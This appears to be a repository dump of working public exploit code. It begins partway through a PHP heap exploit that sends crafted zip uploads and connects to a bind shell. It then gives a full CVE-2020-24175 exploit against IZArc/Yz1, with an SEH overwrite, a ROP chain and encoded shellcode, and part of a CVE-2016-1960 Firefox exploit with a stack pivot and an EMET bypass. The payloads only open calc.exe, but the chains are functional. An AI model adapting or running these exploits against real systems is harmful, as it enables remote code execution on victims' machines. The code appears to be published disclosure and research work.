161 |     directories_length = 0
162 |     for e, dir_offset in directories:
163 |         central_dir = zip_central_dir(dir_offset, e.name, e.data, e.size)
164 |         directories_length += len(central_dir)
165 |         archive.append(central_dir)
166 | 
167 |     end = zip_central_dir_end(len(entries), directories_length, offset)
168 |     archive.append(end)
169 |     return "".join(archive)
170 | 
171 | 
172 | def zip_send(url, archive):
173 |     files = {"file": archive}
174 |     try:
175 |         req = requests.post(url, files=files, timeout=5)
176 |     except requests.exceptions.ConnectionError:
177 |         sys.exit("[-] failed to send archive")
178 |     except requests.exceptions.Timeout:
179 |         return
180 | 
181 |     return req.status_code
182 | 
183 | 
184 | def connect(host, port):
185 |     addr = socket.gethostbyname(host)
186 |     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
187 |     try:
188 |         sock.connect((addr, port))
189 |     except socket.error:
190 |         return
191 | 
192 |     print("\n[+] connected to %s:%d" % (host, port))
193 |     if os.fork() == 0:
194 |         while True:
195 |             try:
196 |                 data = sock.recv(8192)
197 |             except KeyboardInterrupt:
198 |                 sys.exit("\n[!] receiver aborting")
199 |             if data == "":
200 |                 sys.exit("[!] receiver aborting")
201 |             sys.stdout.write(data)
202 |     else:
203 |         while True:
204 |             try:
205 |                 cmd = sys.stdin.readline()
206 |             except KeyboardInterrupt:
207 |                 sys.exit("[!] sender aborting")
208 |             sock.send(cmd)
209 | 
210 | 
211 | def get_shellcode(port):
212 |     p = pack(">H", port)
213 |     if "\x00" in p:
214 |         sys.exit("[-] encode your NUL-bytes")
215 |     return "".join(shellcode) % {"port": p}
216 | 
217 | 
218 | def get_args():
219 |     p = argparse.ArgumentParser()
220 |     p.add_argument("--tries", type=int, default=4096)
221 |     p.add_argument("--bind-port", type=int, default=8000)
222 |     p.add_argument("url", help="POST url")
223 |     return p.parse_args()
224 | 
225 | 
226 | def main():
227 |     args = get_args()
228 |     shellcode = get_shellcode(args.bind_port)
229 |     host = urlparse.urlparse(args.url).netloc.split(":")[0]
230 | 
231 |     print("[*] this may take a while")
232 |     for i in range(args.tries):
233 |         offset = int(zend_mm_heap_offset % i, 16)
234 |         sys.stdout.write("\r[*] %d of %d (0x%x)..." % (i, args.tries, offset))
235 |         sys.stdout.flush()
236 |         for heap in zend_mm_heap:
237 |             archive = zip_create(zip_entries(heap + offset, shellcode))
238 |             if zip_send(args.url, archive) == 404:
239 |                 sys.exit("\n[-] 404: %s" % args.url)
240 |             connect(host, args.bind_port)
241 |     print("\n[-] nope...")
242 | 
243 | if __name__ == "__main__":
244 |     main()
245 | 


--------------------------------------------------------------------------------
/CVE-2020-24175/exploit.py:
--------------------------------------------------------------------------------
  1 | # Author
  2 | # ======
  3 | # Copyright (c) 2020 Hans Jerry Illikainen <hji@dyntopia.com>
  4 | #
  5 | # Target
  6 | # ======
  7 | # IZArc 4.4 running on Windows 10 64bit (although both IZArc and Yz1 are
  8 | # 32bit-only).  The vulnerability was assigned CVE-2020-24175.
  9 | #
 10 | # Usage
 11 | # =====
 12 | # C:\python3-x86\python.exe exploit.py \
 13 | #       --dll C:\path\to\Yz1.dll \
 14 | #       --output archive.yz1 \
 15 | #       --align path-or-number-in-range(4)
 16 | #
 17 | # Note that the payload buffer is suffixed with the extraction path.  In
 18 | # order to overwrite the SEH on an appropriate DWORD boundary we have to
 19 | # make sure that the payload is aligned with regards to the extraction
 20 | # path.  This is done by taking the length of the extraction path
 21 | # (including the last '\') modulo 4.  Thus, we have a 1 in 4 shot for
 22 | # success if the extraction path is completely unknown.  Meh...
 23 | #
 24 | # The `--align` argument can either take a path (in which case it's
 25 | # converted to an integer by `len(path) % 4`) or a number in the
 26 | # interval [0, 4).  See the writeup for an explanation on this ugliness.
 27 | #
 28 | # Also, while the bugs affect the newest version of Yz1 (0.32), the
 29 | # breakpoints are tailored for version 0.30 because that's the version
 30 | # shipped with IZarc.  Either download Yz1.dll 0.30 from the official
 31 | # site or use the DLL that's bundled with IZArc.
 32 | #
 33 | # See the writeup for an explanation why Yz1.dll is used with PyKd to
 34 | # create an exploit for Yz1.dll.
 35 | 
 36 | import sys
 37 | from argparse import ArgumentParser
 38 | from contextlib import contextmanager
 39 | from ctypes import CDLL, c_uint, c_ushort, windll
 40 | from ctypes.wintypes import MAX_PATH
 41 | from multiprocessing import Process
 42 | from os import chdir, getcwd
 43 | from pathlib import Path
 44 | from shutil import rmtree
 45 | from struct import pack, unpack
 46 | from tempfile import TemporaryDirectory
 47 | 
 48 | try:
 49 |     import pykd
 50 | except ImportError:
 51 |     sys.exit(
 52 |         "The standalone pykd module is required.\n"
 53 |         f"Install it with '\"{sys.executable}\" -m pip install pykd'"
 54 |     )
 55 | 
 56 | # $ msfvenom -b '\x00' -f py -v shellcode -e x86/bloxor -a x86 \
 57 | #       -p windows/exec CMD=calc.exe
 58 | shellcode = b""
 59 | shellcode += b"\xe8\xff\xff\xff\xff\xc0\x5a\x6a\x05\x5b\x29"
 60 | shellcode += b"\xda\x6a\x43\x03\x14\x24\x5b\x52\x59\x8d\x49"
 61 | shellcode += b"\x02\x6a\x61\x5e\x0f\xb7\x01\x8d\x49\x02\x8b"
 62 | shellcode += b"\x3a\xc1\xe7\x10\xc1\xef\x10\x89\xfb\x09\xc3"
 63 | shellcode += b"\x21\xc7\xf7\xd7\x21\xdf\x66\x57\x66\x8f\x02"
 64 | shellcode += b"\x8d\x52\x02\x4e\x85\xf6\x0f\x85\xd7\xff\xff"
 65 | shellcode += b"\xff\x9e\x1f\x62\xf7\xe0\xf7\xe0\xf7\x80\x7e"
 66 | shellcode += b"\x65\x4f\xa5\x2b\x2e\x7b\x1e\xf0\x4c\xfc\xc7"
 67 | shellcode += b"\xae\xd3\x25\xa1\x0d\xae\xba\xe4\x9c\xd5\x63"
 68 | shellcode += b"\x79\x5f\x18\x23\x1a\x0f\x3a\xce\xf5\xc3\xf4"
 69 | shellcode += b"\x04\x16\xf6\x44\xa1\xcf\xf3\xdf\x78\x95\x44"
 70 | shellcode += b"\x1e\x08\x0f\x70\xec\x38\xed\xe9\xbc\x62\xe5"
 71 | shellcode += b"\x42\xe4\x91\x6f\xd8\x77\x3b\x4d\x72\xc6\x46"
 72 | shellcode += b"\x4d\x47\x9b\x76\x64\xda\xa5\x15\xa8\x14\x6f"
 73 | shellcode += b"\x2c\x8f\x59\x79\x5a\x04\xa2\x3f\xdf\x1b\xaa"
 74 | shellcode += b"\xff\xf2\x74\xaa\x50\xab\x83\xcd\x08\xc1\x43"
 75 | shellcode += b"\x4a\x1b\x56\x1a\x85\x91\x81\x1a\x80\xca\x09"
 76 | shellcode += b"\x8e\x2d\xaa\x76\xf1\x17\xa8\x4d\xf9\xb2\x19"
 77 | shellcode += b"\xed\x46\xb7\xcd\xa5\x26\x28\x7b\x42\x7a\xcf"
 78 | shellcode += b"\xff\x7d\xff\x7d\xff\x2d\x97\x1c\x1c\x73\x9b"
 79 | shellcode += b"\x8c\x4e\x37\xbe\x82\x1c\xd4\x74\x72\xe1\xcf"
 80 | shellcode += b"\x7c\x30\xa9\x0c\xaf\x70\xa5\xf0\x5e\x10\x2b"
 81 | shellcode += b"\x15\x90\x52\x83\x20\xec\x4a\xec\x19\x13\xcc"
 82 | shellcode += b"\x70\xad\x1c\xce\x32\xab\x4a\xce\x4a\x55"
 83 | 
 84 | 
 85 | class EventHandler(pykd.eventHandler):
 86 |     _breakpoints = {}
 87 |     _pending_breakpoints = {}
 88 | 
 89 |     def __init__(self, breakpoints):
 90 |         super().__init__()
 91 |         self._pending_breakpoints = breakpoints
 92 | 
 93 |     def onLoadModule(self, base, name):
 94 |         for offset, cb in self._pending_breakpoints.get(name.lower(), []):
 95 |             if name not in self._breakpoints:
 96 |                 self._breakpoints[name] = []
 97 |             self._breakpoints[name].append(pykd.setBp(base + offset, cb))
 98 |         return pykd.eventResult.NoChange
 99 | 
100 | 
101 | @contextmanager
102 | def tempdir():
103 |     cwd = getcwd()
104 |     with TemporaryDirectory() as tmp:
105 |         chdir(tmp)
106 |         try:
107 |             yield
108 |         finally:
109 |             chdir(cwd)
110 | 
111 | 
112 | def errx(s):
113 |     print(f"ERROR: {s}", file=sys.stderr)
114 |     sys.exit(1)
115 | 
116 | 
117 | def p8(n, order="<"):
118 |     return pack(f"{order}B", n)
119 | 
120 | 
121 | def p32(n, order="<"):
122 |     return pack(f"{order}I", n)
123 | 
124 | 
125 | def u16(n, order="<"):
126 |     return unpack(f"{order}H", n)[0]
127 | 
128 | 
129 | def u32(n, order="<"):
130 |     return unpack(f"{order}I", n)[0]
131 | 
132 | 
133 | def has_nul(n):
134 |     return any((n >> (8 * i)) & 0xff == 0 for i in range(4))
135 | 
136 | 
137 | def neg(n):
138 |     value = c_uint(-n).value
139 |     if has_nul(value):
140 |         errx(f"-{n} contain NUL bytes")
141 |     return value
142 | 
143 | 
144 | def create_archive(dll, output, align):
145 |     cdll = CDLL(str(dll))
146 | 
147 |     cdll.Yz1GetVersion.restype = c_ushort
148 |     if cdll.Yz1GetVersion() != 30:
149 |         errx("breakpoints are tailored for yz1 version 30")
150 | 
151 |     # fmt: off
152 |     gadgets = [
153 |         ####################################
154 |         # SEH overwrite
155 |         ####################################
156 |         p8(0xff) * (2052 - MAX_PATH - align),
157 | 
158 |         # [00] tar32.dll
159 |         #
160 |         # add esp, 0x139c
161 |         # ret
162 |         p32(0x10015344) * int(MAX_PATH / 4),
163 | 
164 |         p32(0xffffffff) * 250,
165 | 
166 |         ####################################
167 |         # VirtualAlloc() flProtect
168 |         ####################################
169 |         # [01] cabinet5.dll
170 |         #
171 |         # ret
172 |         p32(0x7e0c15e5) * 100,
173 | 
174 |         # [02] tar32.dll
175 |         #
176 |         # pop eax
177 |         # ret
178 |         p32(0x10033825),
179 |         p32(neg(0x40)),
180 | 
181 |         # [03] cabinet5.dll
182 |         #
183 |         # neg eax
184 |         # ret
185 |         p32(0x7e0c6a07),
186 | 
187 |         # [04] tar32.dll
188 |         #
189 |         # mov dword ptr [ebp + 8], eax
190 |         # pop ecx                       ;; noise
191 |         # mov eax, 0x10029e04           ;; noise
192 |         # ret
193 |         p32(0x10029dfa),
194 |         p32(0xffffffff),
195 | 
196 |         # [05] tar32.dll
197 |         #
198 |         # dec ebp
199 |         # or al, 0x75                   ;; noise
200 |         # ret
201 |         p32(0x1003def6) * 4,
202 | 
203 |         ####################################
204 |         # VirtualAlloc() flAllocationType
205 |         ####################################
206 |         # [06] tar32.dll
207 |         #
208 |         # pop eax
209 |         # ret
210 |         p32(0x10033825),
211 |         p32(neg(0x1000 - 1)),
212 | 
213 |         # [07] cabinet5.dll
214 |         #
215 |         # dec eax
216 |         # ret
217 |         p32(0x7e0c16d8),
218 | 
219 |         # [08] cabinet5.dll
220 |         #
221 |         # neg eax
222 |         # ret
223 |         p32(0x7e0c6a07),
224 | 
225 |         # [09] tar32.dll
226 |         #
227 |         # mov dword ptr [ebp + 8], eax
228 |         # pop ecx                       ;; noise
229 |         # mov eax, 0x10029e04           ;; noise
230 |         # ret
231 |         p32(0x10029dfa),
232 |         p32(0xffffffff),
233 | 
234 |         # [10] tar32.dll
235 |         #
236 |         # dec ebp
237 |         # or al, 0x75                   ;; noise
238 |         # ret
239 |         p32(0x1003def6) * 4,
240 | 
241 |         ####################################
242 |         # VirtualAlloc() dwSize
243 |         ####################################
244 |         # [11] tar32.dll
245 |         #
246 |         # push 1
247 |         # pop eax
248 |         # ret
249 |         p32(0x10033823),
250 | 
251 |         # [12] tar32.dll
252 |         #
253 |         # mov dword ptr [ebp + 8], eax
254 |         # pop ecx                       ;; noise
255 |         # mov eax, 0x10029e04           ;; noise
256 |         # ret
257 |         p32(0x10029dfa),
258 |         p32(0xffffffff),
259 | 
260 |         # [13] tar32.dll
261 |         #
262 |         # dec ebp
263 |         # or al, 0x75                   ;; noise
264 |         # ret
265 |         p32(0x1003def6) * 4,
266 | 
267 |         ####################################
268 |         # VirtualAlloc() lpAddress
269 |         ####################################
270 |         # [14] tar32.dll
271 |         #
272 |         # push esp
273 |         # add eax, 0x20
274 |         # pop ebx
275 |         # ret
276 |         p32(0x10031fed),
277 | 
278 |         # [15] tar32.dll
279 |         #
280 |         # mov eax, ebx
281 |         # pop esi                       ;; noise
282 |         # pop ebx                       ;; noise
283 |         # ret
284 |         p32(0x1002f8ec),
285 |         p32(0xffffffff),
286 |         p32(0xffffffff),
287 | 
288 |         # [16] tar32.dll
289 |         #
290 |         # add eax, 0x20
291 |         # pop ebx                       ;; noise
292 |         # ret
293 |         *[
294 |             p32(0x10031fee),
295 |             p32(0xffffffff),
296 |         ] * 4,
297 | 
298 |         # [17] tar32.dll
299 |         #
300 |         # mov dword ptr [ebp + 8], eax
301 |         # pop ecx                       ;; noise
302 |         # mov eax, 0x10029e04           ;; noise
303 |         # ret
304 |         p32(0x10029dfa),
305 |         p32(0xffffffff),
306 | 
307 |         # [18] tar32.dll
308 |         #
309 |         # dec ebp
310 |         # or al, 0x75                   ;; noise
311 |         # ret
312 |         p32(0x1003def6) * 4,
313 | 
314 |         ####################################
315 |         # VirtualAlloc() return address
316 |         ####################################
317 |         # [19] tar32.dll
318 |         #
319 |         # push esp
320 |         # add eax, 0x20                 ;; noise
321 |         # pop ebx
322 |         # ret
323 |         p32(0x10031fed),
324 | 
325 |         # [20] tar32.dll
326 |         #
327 |         # mov eax, ebx
328 |         # pop esi                       ;; noise
329 |         # pop ebx                       ;; noise
330 |         # ret
331 |         p32(0x1002f8ec),
332 |         p32(0xffffffff),
333 |         p32(0xffffffff),
334 | 
335 |         # [21] tar32.dll
336 |         #
337 |         # add eax, 0x20
338 |         # pop ebx                       ;; noise
339 |         # ret
340 |         *[
341 |             p32(0x10031fee),
342 |             p32(0xffffffff),
343 |         ] * 4,
344 | 
345 |         # [22] tar32.dll
346 |         #
347 |         # mov dword ptr [ebp + 8], eax
348 |         # pop ecx                       ;; noise
349 |         # mov eax, 0x10029e04           ;; noise
350 |         # ret
351 |         p32(0x10029dfa),
352 |         p32(0xffffffff),
353 | 
354 |         # [23] tar32.dll
355 |         #
356 |         # dec ebp
357 |         # or al, 0x75                   ;; noise
358 |         # ret
359 |         p32(0x1003def6) * 4,
360 | 
361 |         ####################################
362 |         # VirtualAlloc() IAT in tar32.dll
363 |         ####################################
364 |         # [24] tar32.dll
365 |         #
366 |         # pop eax                       ;; IAT slot for VirtualAlloc()
367 |         # ret
368 |         p32(0x10033825),
369 |         p32(0x100411a0),
370 | 
371 |         # [25] tar32.dll
372 |         #
373 |         # mov eax, dword ptr [eax]
374 |         # ret
375 |         p32(0x100297ce),
376 | 
377 |         # [26] tar32.dll
378 |         #
379 |         # mov dword ptr [ebp + 8], eax
380 |         # pop ecx                       ;; noise
381 |         # mov eax, 0x10029e04           ;; noise
382 |         # ret
383 |         p32(0x10029dfa),
384 |         p32(0xffffffff),
385 | 
386 |         # [27] tar32.dll
387 |         #
388 |         # inc ebp
389 |         # or al, 3                      ;; noise
390 |         # ret
391 |         p32(0x1003b3ba) * 4,
392 | 
393 |         ####################################
394 |         # VirtualAlloc() -> shellcode
395 |         ####################################
396 |         # [28] tar32.dll
397 |         #
398 |         # mov esp, ebp
399 |         # pop ebp
400 |         # ret
401 |         p32(0x1002e9e0),
402 | 
403 |         p32(0x90909090) * 5,
404 |         shellcode,
405 |         p32(0x90909090) * 200,
406 |     ]
407 |     # fmt: on
408 | 
409 |     with open("A" * 0x10, "wb") as f:
410 |         f.write(b"".join(gadgets))
411 | 
412 |     # The contents of the files will be interpreted as a filename, so we
413 |     # need a NUL to prevent an OOB read.
414 |     with open("B" * 0x10, "wb") as f:
415 |         f.write(p8(0x0))
416 | 
417 |     # fmt: off
418 |     cmd = [
419 |         "c",    # create
420 |         "-i2",  # silent mode
421 |         "-r0",  # non-recursive search
422 |         "-x0",  # don't archive full paths
423 |         f"\"{output}\"",
424 |         "*",
425 |     ]
426 |     # fmt: on
427 | 
428 |     rv = cdll.Yz1(None, " ".join(cmd).encode(), None, 0)
429 |     if rv:
430 |         errx(f"yz1 failed with {rv}")
431 | 
432 |     rewrite_header(output)
433 | 
434 | 
435 | def rewrite_header(output):
436 |     """
437 |     Rewrite the size of the archive filenames in the header.
438 |     """
439 |     with output.open("rb+") as f:
440 |         f.seek(4 * 3)
441 |         size = u32(f.peek(4)[:4], ">")
442 |         size += sum(x.stat().st_size for x in Path().iterdir())
443 |         f.write(p32(size, ">"))
444 | 
445 | 
446 | def rewrite_filename():
447 |     """
448 |     Overwrite the terminating NUL-byte for the first filename.
449 | 
450 |     This effectively concatenates the first two filenames.
451 |     """
452 |     this = pykd.reg("ecx")
453 |     buf = pykd.ptrPtr(this + 1036)
454 |     buf_size = pykd.ptrDWord(this + 1040)
455 | 
456 |     files = list(Path().iterdir())
457 |     files_hdr = len(files) * 4 * 2
458 |     files_len = files_hdr + sum(len(x.name) + 1 for x in files)
459 | 
460 |     if files_len == buf_size:
461 |         names = pykd.loadBytes(buf + files_hdr, buf_size - files_hdr)
462 |         for i, byte in enumerate(names):
463 |             if byte == 0:
464 |                 pykd.writeBytes(buf + files_hdr + i, [0x41])
465 |                 break
466 | 
467 | 
468 | def get_image_base(dll):
469 |     with dll.open("rb") as f:
470 |         f.seek(0x3c)
471 |         f.seek(u16(f.read(2)) + 0x34)
472 |         return u32(f.read(4))
473 | 
474 | 
475 | def run_pykd(py, dll, output, align):
476 |     cmd = [
477 |         sys.executable,
478 |         py,
479 |         f"--dll=\"{dll}\"",
480 |         f"--output=\"{output}\"",
481 |         f"--align=\"{align}\"",
482 |     ]
483 |     base = get_image_base(dll)
484 |     breakpoints = {"yz1": [(0x10011270 - base, rewrite_filename)]}
485 |     pykd.initialize()
486 |     pykd.handler = EventHandler(breakpoints)
487 |     pykd.startProcess(" ".join(str(x) for x in cmd))
488 |     pykd.go()
489 | 
490 | 
491 | def abspath(path):
492 |     return Path(path).absolute()
493 | 
494 | 
495 | def parse_args():
496 |     ap = ArgumentParser()
497 |     ap.add_argument(
498 |         "--dll",
499 |         type=abspath,
500 |         required=True,
501 |         help="yz1 dll to use for archive creation",
502 |     )
503 |     ap.add_argument(
504 |         "--output", type=abspath, required=True, help="output file"
505 |     )
506 |     ap.add_argument(
507 |         "--align", help="alignment for the prepended extraction path"
508 |     )
509 |     ap.add_argument(
510 |         "--overwrite", action="store_true", help="overwrite output file"
511 |     )
512 |     args = ap.parse_args()
513 | 
514 |     if not args.dll.is_file():
515 |         errx(f"{args.dll} is not a file")
516 | 
517 |     if args.output.exists():
518 |         if not args.overwrite:
519 |             errx(f"{args.output} already exist")
520 | 
521 |         print(f"removing {args.output}")
522 |         try:
523 |             if args.output.is_file():
524 |                 args.output.unlink()
525 |             else:
526 |                 rmtree(args.output)
527 |         except OSError as e:
528 |             errx(f"could not remove {args.output}: {e.strerror}")
529 |     else:
530 |         args.output.parent.mkdir(parents=True, exist_ok=True)
531 | 
532 |     if args.align:
533 |         if args.align.isnumeric():
534 |             args.align = int(args.align)
535 |         else:
536 |             args.align = len(args.align.rstrip("\\").rstrip("/") + "\\") % 4
537 |     else:
538 |         args.align = len(str(args.output.with_suffix("")) + "\\") % 4
539 | 
540 |     if args.align not in range(4):
541 |         errx(f"--align should either be a path or a digit [0, 4)")
542 | 
543 |     return args
544 | 
545 | 
546 | def main():
547 |     if sys.maxsize != 2 ** 31 - 1:
548 |         errx("32bit python required")
549 | 
550 |     args = parse_args()
551 | 
552 |     # Yz1 doesn't seem to release its locks on files it touches until
553 |     # the module is unloaded.  Maybe PEBKAC but neither FreeLibrary(),
554 |     # pykd.killAllProcesses() nor pykd.deinitialize() seems to be enough
555 |     # to get rid of it.  So, we let pykd/yz1 do their thing in a
556 |     # subprocess to avoid the tempdir cleanup from failing.  Sigh.
557 |     if not windll.kernel32.IsDebuggerPresent():
558 |         py = abspath(__file__)
559 |         with tempdir():
560 |             p = Process(
561 |                 target=run_pykd, args=(py, args.dll, args.output, args.align)
562 |             )
563 |             p.start()
564 |             p.join()
565 |     else:
566 |         create_archive(args.dll, args.output, args.align)
567 |         print(f"=> created: {args.output}")
568 |         print(f"=> extraction path alignment: {args.align}")
569 | 
570 | 
571 | if __name__ == "__main__":
572 |     main()
573 | 


--------------------------------------------------------------------------------
/CVE-2016-1960/CVE-2016-1960.html:
--------------------------------------------------------------------------------
   1 | <!doctype html>
   2 | <html>
   3 | <head>
   4 | <meta http-equiv="cache-control" content="no-cache" charset="utf-8" />
   5 | <title>CVE-2016-1960</title>
   6 | <script>
   7 | /*
   8 |  * Exploit for CVE-2016-1960 [1] targeting Firefox 44.0.2 [2] on WoW64
   9 |  * with/without EMET 5.52.
  10 |  *
  11 |  * Tested on:
  12 |  * - 64bit Windows 10 Pro+Home (version 1703)
  13 |  * - 64bit Windows 7 Pro SP1
  14 |  *
  15 |  * Vulnerability disclosed by ca0nguyen [1].
  16 |  * Exploit written by Hans Jerry Illikainen <hji@dyntopia.com>.
  17 |  *
  18 |  * [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
  19 |  * [2] https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/
  20 |  */
  21 | 
  22 | "use strict";
  23 | 
  24 | /* This is executed after having pivoted the stack.  `esp' points to a
  25 |  * region on the heap, and the original stack pointer is stored in
  26 |  * `edi'.  In order to bypass EMET, the shellcode should make sure to
  27 |  * xchg edi, esp before any protected function is called.
  28 |  *
  29 |  * For convenience, the first two "arguments" to the shellcode is a
  30 |  * module handle for kernel32.dll and the address of GetProcAddress() */
  31 | const shellcode = [
  32 |     "\x8b\x84\x24\x04\x00\x00\x00", /* mov eax, dword [esp + 0x4] */
  33 |     "\x8b\x8c\x24\x08\x00\x00\x00", /* mov ecx, dword [esp + 0x8] */
  34 |     "\x87\xe7",                     /* xchg edi, esp */
  35 |     "\x56",                         /* push esi */
  36 |     "\x57",                         /* push edi */
  37 |     "\x89\xc6",                     /* mov esi, eax */
  38 |     "\x89\xcf",                     /* mov edi, ecx */
  39 |     "\x68\x78\x65\x63\x00",         /* push xec\0 */
  40 |     "\x68\x57\x69\x6e\x45",         /* push WinE */
  41 |     "\x54",                         /* push esp */
  42 |     "\x56",                         /* push esi */
  43 |     "\xff\xd7",                     /* call edi */
  44 |     "\x83\xc4\x08",                 /* add esp, 0x8 */
  45 | 
  46 |     "\x6a\x00",                     /* push 0 */
  47 |     "\x68\x2e\x65\x78\x65",         /* push .exe */
  48 |     "\x68\x63\x61\x6c\x63",         /* push calc */
  49 |     "\x89\xe1",                     /* mov ecx, esp */
  50 |     "\x6a\x01",                     /* push 1 */
  51 |     "\x51",                         /* push ecx */
  52 |     "\xff\xd0",                     /* call eax */
  53 |     "\x83\xc4\x0c",                 /* add esp, 0xc */
  54 | 
  55 |     "\x5f",                         /* pop edi */
  56 |     "\x5e",                         /* pop esi */
  57 |     "\x87\xe7",                     /* xchg edi, esp */
  58 |     "\xc3",                         /* ret */
  59 | ];
  60 | 
  61 | function ROPHelper(pe, rwx) {
  62 |     this.pe = pe;
  63 |     this.rwx = rwx;
  64 |     this.cache = {};
  65 | 
  66 |     this.search = function(instructions) {
  67 |         for (let addr in this.cache) {
  68 |             if (this.match(this.cache[addr], instructions) === true) {
  69 |                 return addr;
  70 |             }
  71 |         }
  72 | 
  73 |         const text = this.pe.text;
  74 |         for (let addr = text.base; addr < text.base + text.size; addr++) {
  75 |             const read = this.rwx.readBytes(addr, instructions.length);
  76 |             if (this.match(instructions, read) === true) {
  77 |                 this.cache[addr] = instructions;
  78 |                 return addr;
  79 |             }
  80 |         }
  81 | 
  82 |         throw new Error("could not find gadgets for " + instructions);
  83 |     };
  84 | 
  85 |     this.match = function(a, b) {
  86 |         if (a.length !== b.length) {
  87 |             return false;
  88 |         }
  89 | 
  90 |         for (let i = 0; i < a.length; i++) {
  91 |             if (a[i] !== b[i]) {
  92 |                 return false;
  93 |             }
  94 |         }
  95 |         return true;
  96 |     };
  97 | 
  98 |     this.execute = function(func, args, cleanup) {
  99 |         const u32array = this.rwx.u32array;
 100 |         const ret = this.rwx.calloc(4);
 101 |         let i = this.rwx.div.mem.idx + 2941; /* gadgets after [A] and [B] */
 102 | 
 103 |         /*
 104 |          * [A] stack pivot
 105 |          *
 106 |          * xchg eax, esp
 107 |          * ret 0x2de8
 108 |          */
 109 |         const pivot = this.search([0x94, 0xc2, 0xe8, 0x2d]);
 110 | 
 111 |         /*
 112 |          * [B] preserve old esp in a nonvolatile register
 113 |          *
 114 |          * xchg eax, edi
 115 |          * ret
 116 |          */
 117 |         const after = this.search([0x97, 0xc3]);
 118 | 
 119 |         /*
 120 |          * [C] address to execute
 121 |          */
 122 |         u32array[i++] = func;
 123 | 
 124 |         if (cleanup === true && args.length > 0) {
 125 |             if (args.length > 1) {
 126 |                 /*
 127 |                  * [E] return address from [C]: cleanup args on the stack
 128 |                  *
 129 |                  * add esp, args.length*4
 130 |                  * ret
 131 |                  */
 132 |                 u32array[i++] = this.search([0x83, 0xc4, args.length*4, 0xc3]);
 133 |             } else {
 134 |                 /*
 135 |                  * [E] return address from [C]: cleanup arg
 136 |                  *
 137 |                  * pop ecx
 138 |                  * ret
 139 |                  */
 140 |                 u32array[i++] = this.search([0x59, 0xc3]);
 141 |             }
 142 |         } else {
 143 |             /*
 144 |              * [E] return address from [C]
 145 |              *
 146 |              * ret
 147 |              */
 148 |             u32array[i++] = this.search([0xc3]);
 149 |         }
 150 | 
 151 |         /*
 152 |          * [D] arguments for [C]
 153 |          */
 154 |         for (let j = 0; j < args.length; j++) {
 155 |             u32array[i++] = args[j];
 156 |         }
 157 | 
 158 |         /*
 159 |          * [F] pop the location for the return value
 160 |          *
 161 |          * pop ecx
 162 |          * ret
 163 |          */
 164 |         u32array[i++] = this.search([0x59, 0xc3]);
 165 | 
 166 |         /*
 167 |          * [G] address to store the return value
 168 |          */
 169 |         u32array[i++] = ret.addr;
 170 | 
 171 |         /*
 172 |          * [H] move the return value to [G]
 173 |          *
 174 |          * mov dword [ecx], eax
 175 |          * ret
 176 |          */
 177 |         u32array[i++] = this.search([0x89, 0x01, 0xc3]);
 178 | 
 179 |         /*
 180 |          * [I] restore the original esp and return
 181 |          *
 182 |          * mov esp, edi
 183 |          * ret
 184 |          */
 185 |         u32array[i++] = this.search([0x89, 0xfc, 0xc3]);
 186 | 
 187 |         this.rwx.execute(pivot, after);
 188 | 
 189 |         return u32array[ret.idx];
 190 |     };
 191 | }
 192 | 
 193 | function ICUUC55(rop, pe, rwx) {
 194 |     this.rop = rop;
 195 |     this.pe = pe;
 196 |     this.rwx = rwx;
 197 |     this.kernel32 = new KERNEL32(rop, pe, rwx);
 198 |     this.icuuc55handle = this.kernel32.GetModuleHandleA("icuuc55.dll");
 199 | 
 200 |     /*
 201 |      * The invocation of uprv_malloc_55() requires special care since
 202 |      * pAlloc points to a protected function (VirtualAlloc).
 203 |      *
 204 |      * ROPHelper.execute() can't be used because:
 205 |      * 1. it pivots the stack to the heap (StackPivot protection)
 206 |      * 2. it returns into the specified function (Caller protection)
 207 |      * 3. the forward ROP chain is based on returns (SimExecFlow protection)
 208 |      *
 209 |      * This function consist of several steps:
 210 |      * 1. a second-stage ROP chain is written to the stack
 211 |      * 2. a first-stage ROP chain is executed that pivots to the heap
 212 |      * 3. the first-stage ROP chain continues by pivoting to #1
 213 |      * 4. uprv_malloc_55() is invoked
 214 |      * 5. the return value is saved
 215 |      * 6. the original stack is restored
 216 |      *
 217 |      * Of note is that uprv_malloc_55() only takes a `size' argument,
 218 |      * and it passes two arguments to the hijacked pAlloc function
 219 |      * pointer (context and size; both in our control).  VirtualAlloc,
 220 |      * on the other hand, expects four arguments.  So, we'll have to
 221 |      * setup the stack so that the values interpreted by VirtualAlloc as
 222 |      * its arguments are reasonably-looking.
 223 |      *
 224 |      * By the time that uprv_malloc_55() is returned into, the stack
 225 |      * will look like:
 226 |      * [A] [B] [C] [D]
 227 |      *
 228 |      * When pAlloc is entered, the stack will look like:
 229 |      * [uprv_malloc_55()-ret] [pContext] [B] [A] [B] [C] [D]
 230 |      *
 231 |      * Since we've set pAlloc to point at VirtualAlloc, the call is
 232 |      * interpreted as VirtualAlloc(pContext, B, A, B);
 233 |      *
 234 |      * Hence, because we want `flProtect' to be PAGE_EXECUTE_READWRITE,
 235 |      * we also have to have a `size' with the same value; meaning our
 236 |      * rwx allocation will only be 0x40 bytes.
 237 |      *
 238 |      * This is not a problem, since we can simply write a small snippet
 239 |      * of shellcode that allocates a larger region in a non-ROPy way
 240 |      * afterwards.
 241 |      */
 242 |     this.uprv_malloc_55 = function(stackAddr) {
 243 |         const func = this.kernel32.GetProcAddress(this.icuuc55handle,
 244 |                                                   "uprv_malloc_55");
 245 |         const ret = this.rwx.calloc(4);
 246 |         const u32array = this.rwx.u32array;
 247 | 
 248 |         /**********************
 249 |          * second stage gadgets
 250 |          **********************/
 251 |         const stackGadgets = new Array(
 252 |             func,
 253 | 
 254 |             0x1000,     /* [A] flAllocationType (MEM_COMMIT) */
 255 |             0x40,       /* [B] dwSize and flProtect (PAGE_EXECUTE_READWRITE) */
 256 |             0x41414141, /* [C] */
 257 |             0x42424242, /* [D] */
 258 | 
 259 |             /*
 260 |              * location to write the return value
 261 |              *
 262 |              * pop ecx
 263 |              * ret
 264 |              */
 265 |             this.rop.search([0x59, 0xc3]),
 266 |             ret.addr,
 267 | 
 268 |             /*
 269 |              * do the write
 270 |              *
 271 |              * mov dword [ecx], eax
 272 |              * ret
 273 |              */
 274 |             this.rop.search([0x89, 0x01, 0xc3]),
 275 | 
 276 |             /*
 277 |              * restore the old stack
 278 |              *
 279 |              * mov esp, edi
 280 |              * ret
 281 |              */
 282 |             this.rop.search([0x89, 0xfc, 0xc3])
 283 |         );
 284 | 
